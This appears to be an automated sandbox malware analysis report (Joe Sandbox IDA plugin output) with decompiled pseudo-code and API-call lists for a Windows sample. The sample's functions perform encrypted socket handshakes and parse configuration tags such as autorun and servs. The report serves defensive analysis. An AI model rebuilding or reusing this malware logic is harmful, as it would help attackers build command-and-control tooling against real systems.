    • getpeername.WS2_32(?), ref: 003D5D94
    • inet_ntoa.WS2_32(?), ref: 003D5D9E
    • sprintf.MSVCRT ref: 003D5DB6
      • Part of subcall function 003D4BDF: memset.MSVCRT ref: 003D4C2D
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4C61
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4C80
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4C90
      • Part of subcall function 003D4BDF: memset.MSVCRT ref: 003D4CA5
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4D4B
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4D68
      • Part of subcall function 003D4BDF: sscanf.MSVCRT ref: 003D4D70
      • Part of subcall function 003DFF10: closesocket.WS2_32(?), ref: 003DFF12
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D40B3
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D4122
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D4165
      • Part of subcall function 003D4054: memset.MSVCRT ref: 003D41AC
      • Part of subcall function 003D4054: htonl.WS2_32(00000000), ref: 003D41C5
      • Part of subcall function 003D4054: getpeername.WS2_32(?,?,?), ref: 003D41EA
      • Part of subcall function 003D4054: memset.MSVCRT ref: 003D4226
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D4233
      • Part of subcall function 003D3EE9: memset.MSVCRT ref: 003D3F19
      • Part of subcall function 003D3EE9: htons.WS2_32(00000000), ref: 003D3F31
      • Part of subcall function 003D3EE9: memset.MSVCRT ref: 003D3F7B
      • Part of subcall function 003D3EE9: htons.WS2_32(?), ref: 003D3FB2
      • Part of subcall function 003D528D: strstr.MSVCRT ref: 003D52A3
      • Part of subcall function 003D528D: strstr.MSVCRT ref: 003D52B8
      • Part of subcall function 003D528D: strstr.MSVCRT ref: 003D52C4
      • Part of subcall function 003D528D: memcpy.MSVCRT ref: 003D52F9
      • Part of subcall function 003D528D: memset.MSVCRT ref: 003D5319
      • Part of subcall function 003D528D: strstr.MSVCRT ref: 003D5343
      • Part of subcall function 003D528D: strstr.MSVCRT ref: 003D536D
      • Part of subcall function 003D528D: memset.MSVCRT ref: 003D538C
      • Part of subcall function 003D528D: memcpy.MSVCRT ref: 003D53A3
      • Part of subcall function 003D528D: strtok.MSVCRT ref: 003D5444
      • Part of subcall function 003D528D: strtok.MSVCRT ref: 003D544C
      • Part of subcall function 003D528D: sscanf.MSVCRT ref: 003D5468
      • Part of subcall function 003D528D: sscanf.MSVCRT ref: 003D5485
      • Part of subcall function 003D528D: strtok.MSVCRT ref: 003D54E6
      • Part of subcall function 003D556B: getpeername.WS2_32(?,?,?), ref: 003D55D6
      • Part of subcall function 003D556B: inet_ntoa.WS2_32(?), ref: 003D55FE
      • Part of subcall function 003D556B: sprintf.MSVCRT ref: 003D5611
      • Part of subcall function 003D556B: strstr.MSVCRT ref: 003D5640
      • Part of subcall function 003D556B: strstr.MSVCRT ref: 003D5652
      • Part of subcall function 003D556B: memset.MSVCRT ref: 003D568F
      • Part of subcall function 003D556B: memcpy.MSVCRT ref: 003D56A1
      • Part of subcall function 003D56CF: memset.MSVCRT ref: 003D5700
      • Part of subcall function 003D56CF: htons.WS2_32(00000000), ref: 003D571E
      • Part of subcall function 003D56CF: htons.WS2_32(00000014), ref: 003D5726
      • Part of subcall function 003D56CF: memset.MSVCRT ref: 003D577A
      • Part of subcall function 003D56CF: htons.WS2_32(?), ref: 003D57B1
      • Part of subcall function 003D5853: CryptStringToBinaryA.CRYPT32(?,?,00000000,?,00000400,00000000,00000000), ref: 003D587E
    • memcpy.MSVCRT ref: 003D5F08
      • Part of subcall function 003D3B23: GetSystemTime.KERNEL32(?,?,?,?,003D5121,00000000,00001000), ref: 003D3B2D
      • Part of subcall function 003D3B23: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,003D5121,00000000,00001000), ref: 003D3B3B
      • Part of subcall function 003D3B23: __aulldiv.INT64 ref: 003D3B50
    • htonl.WS2_32(-00000096), ref: 003D5F3F
      • Part of subcall function 003DEA68: sscanf.MSVCRT ref: 003DEA7E
      • Part of subcall function 003DEA68: inet_addr.WS2_32(?), ref: 003DEA94
      • Part of subcall function 003DEA68: htons.WS2_32(?), ref: 003DEAA7
    • htons.WS2_32(00000000), ref: 003D5FAA
      • Part of subcall function 003D588E: memset.MSVCRT ref: 003D58F8
      • Part of subcall function 003D5949: memset.MSVCRT ref: 003D5979
      • Part of subcall function 003D5949: htons.WS2_32(E`=), ref: 003D5987
      • Part of subcall function 003D5949: memcpy.MSVCRT ref: 003D599B
      • Part of subcall function 003D5949: htons.WS2_32(?), ref: 003D5A0A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D4054, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 299network
    C-Code - Quality: 28%
    			E003D4054(intOrPtr* __ebx, void* __eflags) {
				void* _v8;
				char _v9;
				signed int _v16;
				intOrPtr _v29;
				char _v30;
				char _v32;
				void _v36;
				char _v40;
				intOrPtr _v52;
				char _v56;
				char _v84;
				void* _v88;
				char _v104;
				char _v124;
				char _v144;
				char _v164;
				void _v184;
				void _v204;
				void* __esi;
				int _t85;
				signed short _t88;
				void* _t91;
				void* _t102;
				intOrPtr _t104;
				intOrPtr* _t108;
				signed short _t111;
				void _t113;
				void* _t119;
				void* _t121;
				intOrPtr* _t141;
				signed int _t160;
				signed int _t164;
				intOrPtr* _t171;
				signed int _t172;
				void* _t175;
				void* _t189;
				void* _t202;
				int _t204;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t216;

				_t141 = __ebx;
				_v8 =  *0x3e8538(0x100000);
				if(E003DFD0B( *__ebx, 0x3e6670, 7) != 7 || E003DFB73( *__ebx,  &_v32, 5) != 5 || _v30 != 7) {
					L24:
					 *0x3e8540(_v8);
					_t85 = 0;
				} else {
					_t171 = __imp__#9;
					_t88 =  *_t171(_v29);
					_v9 = 0;
					_v16 = _t88 & 0x0000ffff;
					if(E003DFB73( *__ebx, _v8, _t88 & 0x0000ffff) != _v16) {
						goto L24;
					} else {
						_t91 = 0;
						if(_v16 <= 0) {
							goto L24;
						} else {
							do {
								if( *((char*)(_t91 + _v8)) == 3) {
									_v9 = 1;
								}
								_t91 = _t91 + 1;
							} while (_t91 < _v16);
							if(_v9 == 0 || E003DFB73( *_t141,  &_v32, 5) != 5 || _v30 != 0x81) {
								goto L24;
							} else {
								_v16 =  *_t171(_v29) & 0x0000ffff;
								if(E003DFB73( *_t141, _v8,  *_t171(_v29) & 0x0000ffff) != _v16 || E003DFB73( *_t141,  &_v32, 5) != 5 || _v30 != 0x82) {
									goto L24;
								} else {
									_t172 =  *_t171(_v29) & 0x0000ffff;
									if(E003DFB73( *_t141, _v8, _t172) != _t172 || E003DFB73( *_t141, _v8, 0x200) != 0x200) {
										goto L24;
									} else {
										_t102 = _v8;
										_t248 =  *((char*)(_t102 + 2)) - 8;
										if( *((char*)(_t102 + 2)) != 8) {
											goto L24;
										} else {
											memset(_t102, 0, 0x200);
											asm("movsw");
											asm("movsb");
											_t202 = _v8;
											_t104 = E003D3B23(_t248);
											__imp__#8(_t104);
											 *((intOrPtr*)(_t202 + 3)) = _t104;
											 *((short*)(_t202 + 7)) = 0x404;
											_t108 =  *_t141;
											_v40 = 0x10;
											__imp__#5( *_t108,  &_v56,  &_v40);
											if(_t108 != 0) {
												goto L24;
											} else {
												_t159 = _v52;
												 *((intOrPtr*)(_t202 + 9)) = _v52;
												if(E003DFD0B( *_t141, _t202, 0x200) != 0x200) {
													goto L24;
												} else {
													_t111 = E003DE937(_t159);
													_t175 = _v8;
													_t204 = 0;
													 *(_t141 + 4) = _t111;
													memset(_t175, 0, 0x200);
													_t113 =  *(_t141 + 4) & 0x0000ffff;
													__imp__#9(_t113);
													 *_t175 = _t113;
													 *((char*)(_t175 + 2)) = 5;
													do {
														 *((char*)(_t216 + _t204 - 0x20)) = E003DE8E0();
														_t204 = _t204 + 1;
													} while (_t204 < 0x14);
													_t160 = 5;
													memcpy(_t175 + 3,  &_v36, _t160 << 2);
													if(E003DFD0B( *_t141, _v8, 0x200) != 0x200 || E003DFB73( *_t141, _v8, 0x200) != 0x200 ||  *((char*)(_v8 + 2)) != 6) {
														goto L24;
													} else {
														_t164 = 5;
														_t119 = memcpy( &_v204,  &_v36, _t164 << 2);
														_t121 = memcpy(memcpy( &_v184, _t119 + 3, 0 << 2),  &_v204, 0 << 2);
														_t189 = 0x29;
														 *((char*)(_t121 + 0x28)) = 0;
														E003D3B5C();
														_t211 = _v8;
														 *((char*)(_t211 + 0x28)) = 1;
														E003D3B5C(_t211, _t189,  &_v144);
														 *((char*)(_t211 + 0x28)) = 2;
														E003D3B5C(_t211, _t189,  &_v124);
														 *((char*)(_t211 + 0x28)) = 3;
														E003D3B5C(_t211, _t189,  &_v104);
														 *((char*)(_t211 + 0x28)) = 4;
														E003D3B5C(_t211, _t189,  &_v84);
														_t212 = _t141 + 8;
														 *0x3e8ab4(_t212, _t121, _t189,  &_v164, 0xa, 5);
														 *0x3e899c(_t212,  &_v144, 0x14);
														_t213 = _t141 + 0x7c;
														 *0x3e8ab4(_t213);
														 *0x3e899c(_t213,  &_v124, 0x14);
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("stosd");
														asm("stosd");
														asm("stosd");
														asm("stosd");
														 *(_t141 + 0x120) =  *(_t141 + 0x120) & 0x00000000;
														asm("stosd");
														asm("stosd");
														asm("stosd");
														asm("stosd");
														 *(_t141 + 0x134) =  *(_t141 + 0x134) & 0x00000000;
														 *0x3e8540(_v8);
														_t85 = 1;
														__eflags = 1;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _t85;
			}













































    0x003d4054
    0x003d4074
    0x003d4082
    0x003d428b
    0x003d428e
    0x003d4294
    0x003d40aa
    0x003d40ad
    0x003d40b3
    0x003d40be
    0x003d40c2
    0x003d40cf
    0x00000000
    0x003d40d5
    0x003d40d5
    0x003d40da
    0x00000000
    0x003d40e0
    0x003d40e0
    0x003d40e7
    0x003d40e9
    0x003d40e9
    0x003d40ed
    0x003d40ee
    0x003d40f7
    0x00000000
    0x003d411f
    0x003d412d
    0x003d413a
    0x00000000
    0x003d4162
    0x003d4169
    0x003d4179
    0x00000000
    0x003d4199
    0x003d4199
    0x003d419c
    0x003d41a0
    0x00000000
    0x003d41a6
    0x003d41ac
    0x003d41b6
    0x003d41b8
    0x003d41b9
    0x003d41bf
    0x003d41c5
    0x003d41cb
    0x003d41d3
    0x003d41df
    0x003d41e1
    0x003d41ea
    0x003d41f2
    0x00000000
    0x003d41f8
    0x003d41f8
    0x003d4204
    0x003d4213
    0x00000000
    0x003d4215
    0x003d4215
    0x003d421a
    0x003d421e
    0x003d4222
    0x003d4226
    0x003d422b
    0x003d4233
    0x003d4239
    0x003d423c
    0x003d4240
    0x003d4245
    0x003d4249
    0x003d424a
    0x003d4251
    0x003d4258
    0x003d426f
    0x00000000
    0x003d429b
    0x003d429d
    0x003d42a9
    0x003d42c4
    0x003d42cf
    0x003d42d2
    0x003d42d6
    0x003d42db
    0x003d42ea
    0x003d42ee
    0x003d42fc
    0x003d4300
    0x003d430e
    0x003d4312
    0x003d4320
    0x003d4324
    0x003d432c
    0x003d4330
    0x003d4340
    0x003d4346
    0x003d434a
    0x003d4357
    0x003d4366
    0x003d4367
    0x003d4368
    0x003d4369
    0x003d4373
    0x003d4374
    0x003d4375
    0x003d4376
    0x003d4382
    0x003d4383
    0x003d4384
    0x003d4385
    0x003d4386
    0x003d4395
    0x003d4396
    0x003d4397
    0x003d4398
    0x003d4399
    0x003d43a0
    0x003d43a8
    0x003d43a8
    0x003d43a8
    0x003d426f
    0x003d4213
    0x003d41f2
    0x003d41a0
    0x003d4179
    0x003d413a
    0x003d40f7
    0x003d40da
    0x003d40cf
    0x003d43ad

    APIs
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFDE5
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFDF7
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFE15
      • Part of subcall function 003DFD0B: memset.MSVCRT ref: 003DFE5E
      • Part of subcall function 003DFD0B: htons.WS2_32(00000301), ref: 003DFEB9
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFEC2
      • Part of subcall function 003DFD0B: send.WS2_32(?,?,?,00000000), ref: 003DFED4
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBB0
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBC9
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBD8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBED
      • Part of subcall function 003DFB73: htons.WS2_32(?), ref: 003DFC25
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCA2
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCB8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCD6
    • htons.WS2_32(?), ref: 003D40B3
    • htons.WS2_32(?), ref: 003D4122
    • htons.WS2_32(?), ref: 003D4165
    • memset.MSVCRT ref: 003D41AC
      • Part of subcall function 003D3B23: GetSystemTime.KERNEL32(?,?,?,?,003D5121,00000000,00001000), ref: 003D3B2D
      • Part of subcall function 003D3B23: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,003D5121,00000000,00001000), ref: 003D3B3B
      • Part of subcall function 003D3B23: __aulldiv.INT64 ref: 003D3B50
    • htonl.WS2_32(00000000), ref: 003D41C5
    • getpeername.WS2_32(?,?,?), ref: 003D41EA
    • memset.MSVCRT ref: 003D4226
    • htons.WS2_32(?), ref: 003D4233
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D61AD, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182network
    C-Code - Quality: 37%
    			E003D61AD(intOrPtr* _a4, signed short _a8) {
				intOrPtr _v8;
				void _v24;
				char _v44;
				void _v160;
				void* __esi;
				void* _t47;
				signed int _t50;
				intOrPtr* _t54;
				short _t56;
				intOrPtr* _t57;
				void* _t75;
				void _t82;
				void* _t94;
				void* _t95;
				void* _t96;
				signed int _t97;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				intOrPtr* _t113;
				void* _t117;
				intOrPtr* _t118;

				_t109 = _a4;
				 *(_t109 + 0x468) =  *(_t109 + 0x468) & 0x00000000;
				 *(_t109 + 0x46c) =  *(_t109 + 0x46c) & 0x00000000;
				_t47 =  *0x3e8538(0x200);
				_t94 = _t47;
				_v8 =  *0x3e8538(0x200);
				memset(_t94, 0, 0x200);
				 *_t94 = 1;
				_t50 =  *(_t109 + 0x138) & 0x0000ffff;
				__imp__#9(_t50);
				 *(_t94 + 3) = _t50;
				sprintf( &_v24, ":%d", _a8 & 0x0000ffff);
				_t54 =  &_v24;
				_t95 = _t54 + 1;
				do {
					_t107 =  *_t54;
					_t54 = _t54 + 1;
				} while (_t107 != 0);
				_t56 = _t54 - _t95 + 1;
				__imp__#9(_t56);
				 *((short*)(_t94 + 9)) = _t56;
				_t57 =  &_v24;
				_t96 = _t57 + 1;
				do {
					_t108 =  *_t57;
					_t57 = _t57 + 1;
				} while (_t108 != 0);
				_t17 = _t94 + 0xb; // 0xb
				memcpy(_t17,  &_v24, _t57 - _t96 + 1);
				_t18 = _t109 + 0x338; // 0x338
				_t117 = _t18;
				 *0x3e899c(_t117, _t94, 0x1fd);
				_t97 = 0x1d;
				memcpy( &_v160, _t117, _t97 << 2);
				 *0x3e8ab0( &_v160,  &_v44);
				_t113 = _a4;
				 *((intOrPtr*)(_t94 + 5)) = _v44;
				_t26 = _t113 + 0x450; // 0x450
				_t27 = _t113 + 0x440; // 0x440
				_t29 = _t113 + 0x420; // 0x420
				if(E003D3BB7(_t29, _t94, 0x1fd, _v8, _t27, _t26) == 0) {
					L12:
					 *0x3e8540(_t94);
					 *0x3e8540(_v8);
					_t75 = 0;
				} else {
					memset(_t94, 0, 0x200);
					_t118 = _t113;
					_t30 = _t118 + 0x120; // 0x120
					_t31 = _t118 + 0x110; // 0x110
					_t32 = _t94 + 3; // 0x3
					_t34 = _t118 + 0xf0; // 0xf0
					if(E003D3BB7(_t34, _v8, 0x1fd, _t32, _t31, _t30) == 0) {
						goto L12;
					} else {
						_t82 =  *(_t118 + 4) & 0x0000ffff;
						__imp__#9(_t82);
						 *_t94 = _t82;
						 *((char*)(_t94 + 2)) = 3;
						if(E003DFD0B( *_t118, _t94, 0x200) != 0x200 || E003DFB73( *_t118, _t94, 0x200) != 0x200 ||  *((char*)(_t94 + 2)) != 3) {
							goto L12;
						} else {
							_t85 = _t113;
							_t38 = _t85 + 0x134; // 0x134
							_t39 = _t85 + 0x124; // 0x124
							_t41 = _t94 + 3; // 0x3
							if(E003D3BB7(_t113 + 0x100, _t41, 0x1fd, _v8, _t39, _t38) == 0) {
								goto L12;
							} else {
								_t42 = _t113 + 0x464; // 0x464
								_t43 = _t113 + 0x454; // 0x454
								if(E003D3BB7(_t113 + 0x430, _v8, 0x1fd, _t94, _t43, _t42) == 0 ||  *_t94 != 4) {
									goto L12;
								} else {
									 *0x3e8540(_t94);
									 *0x3e8540(_v8);
									_t75 = 1;
								}
							}
						}
					}
				}
				return _t75;
			}

























    0x003d61b9
    0x003d61bc
    0x003d61c3
    0x003d61d0
    0x003d61d7
    0x003d61e6
    0x003d61e9
    0x003d61ee
    0x003d61f1
    0x003d61fc
    0x003d6202
    0x003d6214
    0x003d621a
    0x003d6220
    0x003d6223
    0x003d6223
    0x003d6225
    0x003d6226
    0x003d622c
    0x003d622e
    0x003d6234
    0x003d6238
    0x003d623b
    0x003d623e
    0x003d623e
    0x003d6240
    0x003d6241
    0x003d624d
    0x003d6251
    0x003d625b
    0x003d625b
    0x003d6262
    0x003d626a
    0x003d627c
    0x003d627e
    0x003d6287
    0x003d628a
    0x003d628d
    0x003d6294
    0x003d629e
    0x003d62b5
    0x003d6398
    0x003d6399
    0x003d63a2
    0x003d63a8
    0x003d62bb
    0x003d62c3
    0x003d62c8
    0x003d62ca
    0x003d62d1
    0x003d62d8
    0x003d62e4
    0x003d62f5
    0x00000000
    0x003d62fb
    0x003d62fb
    0x003d6300
    0x003d630b
    0x003d630e
    0x003d6324
    0x00000000
    0x003d633e
    0x003d633e
    0x003d6340
    0x003d6347
    0x003d6357
    0x003d636b
    0x00000000
    0x003d636d
    0x003d636d
    0x003d6374
    0x003d6391
    0x00000000
    0x003d63ac
    0x003d63ad
    0x003d63b6
    0x003d63be
    0x003d63be
    0x003d6391
    0x003d636b
    0x003d6324
    0x003d62f5
    0x003d63c5

    APIs
    • memset.MSVCRT ref: 003D61E9
    • htons.WS2_32(?), ref: 003D61FC
    • sprintf.MSVCRT ref: 003D6214
    • htons.WS2_32(?), ref: 003D622E
    • memcpy.MSVCRT ref: 003D6251
      • Part of subcall function 003D3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003D3BCF
      • Part of subcall function 003D3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003D3C60
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3C71
      • Part of subcall function 003D3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003D3D87
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DD2
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3DF2
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DFD
    • memset.MSVCRT ref: 003D62C3
    • htons.WS2_32(?), ref: 003D6300
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFDE5
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFDF7
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFE15
      • Part of subcall function 003DFD0B: memset.MSVCRT ref: 003DFE5E
      • Part of subcall function 003DFD0B: htons.WS2_32(00000301), ref: 003DFEB9
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFEC2
      • Part of subcall function 003DFD0B: send.WS2_32(?,?,?,00000000), ref: 003DFED4
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBB0
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBC9
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBD8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBED
      • Part of subcall function 003DFB73: htons.WS2_32(?), ref: 003DFC25
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCA2
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCB8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCD6
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003DF94E, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 212network
    APIs
      • Part of subcall function 003DED7D: memcpy.MSVCRT ref: 003DEDCE
      • Part of subcall function 003DED7D: memcpy.MSVCRT ref: 003DEDE1
      • Part of subcall function 003DED7D: memcpy.MSVCRT ref: 003DEE08
      • Part of subcall function 003DED7D: memcpy.MSVCRT ref: 003DEEA9
    • send.WS2_32(?,?,0000008B,00000000), ref: 003DFA0A
    • htons.WS2_32(00000301), ref: 003DFA3F
    • htons.WS2_32(00000001), ref: 003DFA47
    • send.WS2_32(?,?,00000006,00000000), ref: 003DFA5D
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFDE5
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFDF7
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFE15
      • Part of subcall function 003DFD0B: memset.MSVCRT ref: 003DFE5E
      • Part of subcall function 003DFD0B: htons.WS2_32(00000301), ref: 003DFEB9
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFEC2
      • Part of subcall function 003DFD0B: send.WS2_32(?,?,?,00000000), ref: 003DFED4
      • Part of subcall function 003DF4EF: recv.WS2_32(?,00000000,003DF7A5,00000000), ref: 003DF519
    • htons.WS2_32(?), ref: 003DFAEA
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBB0
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBC9
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBD8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBED
      • Part of subcall function 003DFB73: htons.WS2_32(?), ref: 003DFC25
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCA2
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCB8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCD6
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CAA60, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 195
    C-Code - Quality: 50%
    			E003CAA60(void* __ecx) {
				void* _v8;
				char _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				short _v40;
				char _v44;
				void* __edi;
				void* __esi;
				intOrPtr* _t61;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr* _t66;
				intOrPtr* _t67;
				intOrPtr* _t71;
				intOrPtr* _t76;
				void* _t77;
				char _t78;
				char _t79;
				intOrPtr* _t80;
				intOrPtr* _t83;
				intOrPtr _t87;
				intOrPtr* _t88;
				intOrPtr* _t90;
				void* _t93;
				intOrPtr _t95;
				void* _t127;
				void* _t128;
				void* _t130;

				_t127 = __ecx;
				_t61 =  *((intOrPtr*)(__ecx + 4));
				_v20 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				if(_t61 != 0) {
					_push( &_v20);
					_push(_t61);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t61 + 0xb4))))() >= 0) {
						_t71 = _v20;
						_push( &_v12);
						_push(_t71);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t71 + 0xa4))))() >= 0 && E003E10C0( &_v44, _v12) == 6 && _v44 == 0x6f63636d && _v40 == 0x666e) {
							_t76 = _v20;
							_t77 =  *((intOrPtr*)( *((intOrPtr*)( *_t76 + 0x34))))(_t76,  &_v8);
							if(_t77 >= 0) {
								_push(_t128);
								if(_t77 == 1) {
									L35:
									_v28 = 1;
								} else {
									while(1) {
										_t78 = _v12;
										if(_t78 != 0) {
											__imp__#6(_t78);
										}
										_t79 = _v16;
										_v12 = 0;
										if(_t79 != 0) {
											__imp__#6(_t79);
										}
										_t80 = _v8;
										_v16 = 0;
										_push( &_v12);
										_push(_t80);
										if( *((intOrPtr*)( *((intOrPtr*)( *_t80 + 0xa4))))() < 0) {
											goto L36;
										}
										_t83 = _v8;
										_push( &_v16);
										_push(_t83);
										if( *((intOrPtr*)( *((intOrPtr*)( *_t83 + 0x68))))() >= 0) {
											_t31 =  &_v44; // 0x6f63636d
											_t87 = E003E10C0(_t31, _v12);
											if(_t87 != 3) {
												if(_t87 != 4) {
													if(_t87 != 5) {
														if(_t87 != 7 || _v44 != 0x6f747561 || _v40 != 0x6e7572) {
															goto L33;
														} else {
															_t93 = E003CDCD0(_t127, _t127, _t128, _v8);
															goto L32;
														}
													} else {
														if(_v44 != 0x76726573 || _v40 != 0x73) {
															goto L33;
														} else {
															_t93 = E003C3E30(_t127, _v8);
															L32:
															if(_t93 != 0) {
																goto L33;
															}
														}
													}
												} else {
													if(_v44 == 0x67617467) {
														_t95 =  *((intOrPtr*)(_t127 + 0x14));
														if(_t95 != 0) {
															_t95 = E003CBB40(_t95);
															_t130 = _t130 + 4;
														}
														__imp__#2(_v16);
														 *((intOrPtr*)(_t127 + 0x14)) = _t95;
													}
													goto L33;
												}
											} else {
												if(_v44 == 0x726576) {
													__imp___wtoi(_v16);
													_t130 = _t130 + 4;
													 *((intOrPtr*)(_t127 + 0x10)) = _t87;
												}
												L33:
												_t88 = _v8;
												_t128 =  *((intOrPtr*)( *((intOrPtr*)( *_t88 + 0x40))))(_t88,  &_v24);
												if(_t128 >= 0) {
													_t90 = _v8;
													 *((intOrPtr*)( *((intOrPtr*)( *_t90 + 8))))(_t90);
													_v8 = _v24;
													_v24 = 0;
													if(_t128 != 1) {
														continue;
													} else {
														goto L35;
													}
												}
											}
										}
										goto L36;
									}
								}
								L36:
							}
						}
					}
					_t64 = _v16;
					if(_t64 != 0) {
						__imp__#6(_t64);
					}
					_t65 = _v12;
					if(_t65 != 0) {
						__imp__#6(_t65);
					}
					_t66 = _v8;
					if(_t66 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t66 + 8))))(_t66);
					}
					_t67 = _v20;
					if(_t67 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t67 + 8))))(_t67);
					}
					return _v28;
				} else {
					return 0;
				}
			}

































    0x003caa6a
    0x003caa6c
    0x003caa6f
    0x003caa72
    0x003caa75
    0x003caa78
    0x003caa7b
    0x003caa7e
    0x003caa83
    0x003caa92
    0x003caa93
    0x003caa9e
    0x003caaa4
    0x003caaac
    0x003caaad
    0x003caab8
    0x003caaee
    0x003caafb
    0x003caaff
    0x003cab05
    0x003cab09
    0x003cac39
    0x003cac39
    0x00000000
    0x003cab10
    0x003cab10
    0x003cab15
    0x003cab18
    0x003cab18
    0x003cab1e
    0x003cab21
    0x003cab26
    0x003cab29
    0x003cab29
    0x003cab2f
    0x003cab35
    0x003cab3a
    0x003cab3b
    0x003cab46
    0x00000000
    0x00000000
    0x003cab4c
    0x003cab54
